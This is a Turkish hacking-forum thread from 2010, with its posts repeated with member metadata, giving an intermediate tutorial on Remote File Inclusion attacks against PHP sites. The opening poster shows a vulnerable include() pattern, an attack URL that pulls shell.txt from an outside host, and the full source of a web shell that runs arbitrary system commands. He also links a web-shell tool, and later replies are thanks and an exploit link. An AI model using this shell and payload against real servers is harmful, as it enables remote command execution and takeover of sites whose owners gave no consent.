Exploit orta düzey::

m0liver · 06-06-2010, 19:17

Buradaki bilgiler Exploit ile birazda olsa ilgilenmiş kişiler içindir. Daha önce hiç ilginiz olmadıysa aşağıdaki linki inceleyiniz:
http://www.wardom.org/exploiting-baslangic-t387082.html

m0liver · 06-06-2010, 19:37

Pentest(Penetration test) olarak bilinir. Sisteme girmek için her türlü yola başvurulur ve sisteme girildikten sonra yetki elde edilir.

Siz de kendinize Pentest için bir ortam kurun. aşağıdaki bilgileri sırayla uygulayın: Görüldüğü üzere virtual machine kuruyorsunuz.

Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=387090
Pentest aracı bt4 ve winxp kuruyorsunuz.

m0liver · 06-06-2010, 21:19

Rfi, uzaktan kod çalıştırmamızı sağlar. Bu şekilde sistemde büyük zararlara neden olabilirsiniz.

Aşağıdaki Php kodunu inceleyelim:

PHP Kod:


			
<?php



$page = $_GET['page'];



if (isset($page))

{

include($page);

}



?>

Page değişkenine GET olarak çağırılıyor.

ornek.php?page=sayfa.php

normalde sayfa.php çağırılırken,
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=387090

Biz buraya kodumuzu yerleştiriyoruz:

ornek.php?page=http://www.ornek.com/shell.txt?

Sonra neler oluyor bakalım

PHP Kod:


			
<?php



$page = $_GET['page'];



if (isset($page))

{

include('http://www.ornek.com/shell.txt?');

}



?>

Görüldüğü üzere uzaktaki dosya include ediliyor.

shell.txt içeriğimizi de şöyle yapalım

PHP Kod:


			
<?php



$command = $_GET['cmd'];



if ($command)

{

@system($command);

}

echo "

<form method='GET'>

<input type='text' name='cmd'>

<input type='submit' name='submit' value='Go!'>

</form>";



?>

böylelikle system fonksiyonu sayesinde unix komutları çalıştırabiliyoruz. Bugünlerde paylaştığım;

Kod:

http://www.wardom.org/websh-t385533.html

tool'uda kullanabilirsiniz. Gayet işlevseldir.

Geri kanal kısımda, sizin unix bilginize kalmış.

Teşekkürler...

pentimento · 06-06-2010, 21:28

Eline sağlık evren,

sidar2000 · 06-06-2010, 21:33

elinize sağlık

.

Numune19 · 06-06-2010, 21:41

Eline saglık Bulundugun konumun hakkını veriyorsun .

B0Z0 · 07-06-2010, 01:35

http://www.wardom.org/showpost.php?p...66&postcount=9

rfi açığının exploitlerle kullanımı.

justreal · 29-10-2010, 19:18

elinize sağlık

06-06-2010, 19:17	#1
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	Exploit orta düzey:: Buradaki bilgiler Exploit ile birazda olsa ilgilenmiş kişiler içindir. Daha önce hiç ilginiz olmadıysa aşağıdaki linki inceleyiniz: http://www.wardom.org/exploiting-baslangic-t387082.html

06-06-2010, 19:37	#2
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	PenTester Kimdir? Pentest(Penetration test) olarak bilinir. Sisteme girmek için her türlü yola başvurulur ve sisteme girildikten sonra yetki elde edilir. Siz de kendinize Pentest için bir ortam kurun. aşağıdaki bilgileri sırayla uygulayın: Görüldüğü üzere virtual machine kuruyorsunuz. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=387090 Pentest aracı bt4 ve winxp kuruyorsunuz. Düzenleyen m0liver : 06-06-2010 at 19:40.

06-06-2010, 21:19	#3
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	Rfi kullanımı hakkında Rfi, uzaktan kod çalıştırmamızı sağlar. Bu şekilde sistemde büyük zararlara neden olabilirsiniz. Aşağıdaki Php kodunu inceleyelim: PHP Kod: `<?php $page = $_GET['page']; if (isset($page)) { include($page); } ?>` Page değişkenine GET olarak çağırılıyor. ornek.php?page=sayfa.php normalde sayfa.php çağırılırken, Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=387090 Biz buraya kodumuzu yerleştiriyoruz: ornek.php?page=http://www.ornek.com/shell.txt? Sonra neler oluyor bakalım PHP Kod: `<?php $page = $_GET['page']; if (isset($page)) { include('http://www.ornek.com/shell.txt?'); } ?>` Görüldüğü üzere uzaktaki dosya include ediliyor. shell.txt içeriğimizi de şöyle yapalım PHP Kod: `<?php $command = $_GET['cmd']; if ($command) { @system($command); } echo " <form method='GET'> <input type='text' name='cmd'> <input type='submit' name='submit' value='Go!'> </form>"; ?>` böylelikle system fonksiyonu sayesinde unix komutları çalıştırabiliyoruz. Bugünlerde paylaştığım; Kod: http://www.wardom.org/websh-t385533.html tool'uda kullanabilirsiniz. Gayet işlevseldir. Geri kanal kısımda, sizin unix bilginize kalmış. Teşekkürler...

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

06-06-2010, 21:28	#4
pentimento Forum Ustası Kayıt Tarihi: Apr 2006 Üye numarası: #60756 Mesaj sayısı: 3,801 Karma etkisi: 20134 Karma: 2012412	Eline sağlık evren,

06-06-2010, 21:33	#5
sidar2000 Forum Ustası Kayıt Tarihi: Oct 2007 Üye numarası: #153443 Yer: ist. Mesaj sayısı: 8,072 Karma etkisi: 53013 Karma: 5300013	elinize sağlık .

06-06-2010, 21:41	#6
Numune19 En Yardımsever Üye Kayıt Tarihi: Dec 2009 Üye numarası: #398031 Yer: siz . Mesaj sayısı: 7,631 Karma etkisi: 59204 Karma: 5919411	Eline saglık Bulundugun konumun hakkını veriyorsun .

07-06-2010, 01:35	#7
B0Z0 Banned Kayıt Tarihi: Sep 2006 Üye numarası: #86806 Yer: siz'im :p Mesaj sayısı: 2,281 Karma etkisi: 0 Karma: 2287147	http://www.wardom.org/showpost.php?p...66&postcount=9 rfi açığının exploitlerle kullanımı.

29-10-2010, 19:18	#8
justreal Cool Üye Kayıt Tarihi: Jul 2009 Üye numarası: #348900 Mesaj sayısı: 204 Karma etkisi: 3691 Karma: 368890	elinize sağlık

Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)